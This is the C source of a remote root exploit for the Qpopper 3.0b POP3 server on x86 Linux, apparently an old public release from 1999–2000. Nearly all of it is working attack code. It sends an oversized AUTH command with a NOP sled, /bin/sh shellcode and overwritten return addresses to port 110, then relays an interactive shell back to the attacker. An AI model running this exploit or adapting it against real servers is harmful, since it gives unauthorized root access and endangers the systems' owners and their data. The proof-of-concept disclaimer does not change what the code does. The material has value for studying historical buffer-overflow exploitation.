/* * Qpopper 3.0b remote exploit for x86 Linux (tested on RedHat/2.0.38) * * Dec 1999 by Mixter / http://1337.tsx.org * * Exploits pop_msg buffer overflow to spawn a remote root shell. * This probably works with the old qpop2 code for bsd, solaris anyone? * * 3.0b18 = Offset 1 * * WARNING: YOU ARE USING THIS SOFTWARE ON YOUR OWN RISK. THIS IS A * PROOF-OF-CONCEPT PROGRAM AND YOU TAKE FULL RESPONSIBILITY FOR WHAT YOU * DO WITH IT! DO NOT ABUSE THIS FOR ILLICIT PURPOSES! */ #include #include #include #include #include #include #include #include #include #include #define NOP 0x90 #define LEN 1032 #define CODESTART 880 #define RET 0xbfffd655 /* x86 linux shellcode. this can be a simple execve to /bin/sh on all systems, but MUST NOT contain the characters 'x17' or 'x0c' because that would split the exploit code into separate arg buffers [2000]*/ char *shellcode = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab" "\x89\xfa\x31\xc0\xab\xb0\x04\x04\x07\xcd\x80\x31\xc0\x89\xc3\x40\xcd\x80" "\xe8\xd9\xff\xff\xff/bin/sh"; unsigned long resolve (char *); void term (int, int); unsigned long get_sp (); int main (int argc, char **argv) { char buffer[LEN]; char *codeptr = shellcode; long retaddr = RET; int i, s; struct sockaddr_in sin; if (argc < 2) { printf ("usage: %s [offset]\n", argv[0]); printf ("use offset -1 to try local esp\n"); exit (0); } if (argc > 2) { if (atoi (argv[2]) == -1) { /* 8000 = approx. byte offset to qpopper's top of stack at the time it prints out the auth error message */ retaddr = get_sp () - 8000 - LEN; printf ("Using local esp as ret address...\n"); } retaddr += atoi (argv[2]); } for (i = 0; i < LEN; i++) *(buffer + i) = NOP; for (i = CODESTART + 2; i < LEN; i += 4) *(int *) &buffer[i] = retaddr; for (i = CODESTART; i < CODESTART + strlen (shellcode); i++) *(buffer + i) = *(codeptr++); buffer[0] = 'A'; buffer[1] = 'U'; buffer[2] = 'T'; buffer[3] = 'H'; buffer[4] = ' '; printf ("qpop 3.0 remote root exploit (linux) by Mixter\n"); printf ("[return address: 0x%lx buffer size: %d code size: %d]\n", retaddr, strlen (buffer), strlen (shellcode)); fflush (0); sin.sin_family = AF_INET; sin.sin_port = htons (110); sin.sin_addr.s_addr = resolve (argv[1]); s = socket (AF_INET, SOCK_STREAM, 0); if (connect (s, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0) { perror ("connect"); exit (0); } switch (write (s, buffer, strlen (buffer))) { case 0: case -1: fprintf (stderr, "write error: %s\n", strerror (errno)); break; default: break; } write (s, "\n\n", 1); term (s, 0); return 0; } unsigned long resolve (char *host) { struct hostent *he; struct sockaddr_in tmp; if (inet_addr (host) != -1) return (inet_addr (host)); he = gethostbyname (host); if (he) memcpy ((caddr_t) & tmp.sin_addr.s_addr, he->h_addr, he->h_length); else { perror ("gethostbyname"); exit (0); } return (tmp.sin_addr.s_addr); } unsigned long get_sp (void) { __asm__ ("movl %esp, %eax"); } void term (int p, int c) { char buf[LEN]; fd_set rfds; int i; while (1) { FD_ZERO (&rfds); FD_SET (p, &rfds); FD_SET (c, &rfds); if (select ((p > c ? p : c) + 1, &rfds, NULL, NULL, NULL) < 1) return; if (FD_ISSET (c, &rfds)) { if ((i = read (c, buf, sizeof (buf))) < 1) exit (0); else write (p, buf, i); } if (FD_ISSET (p, &rfds)) { if ((i = read (p, buf, sizeof (buf))) < 1) exit (0); else write (c, buf, i); } } } /* www.hack.co.za [2000]*/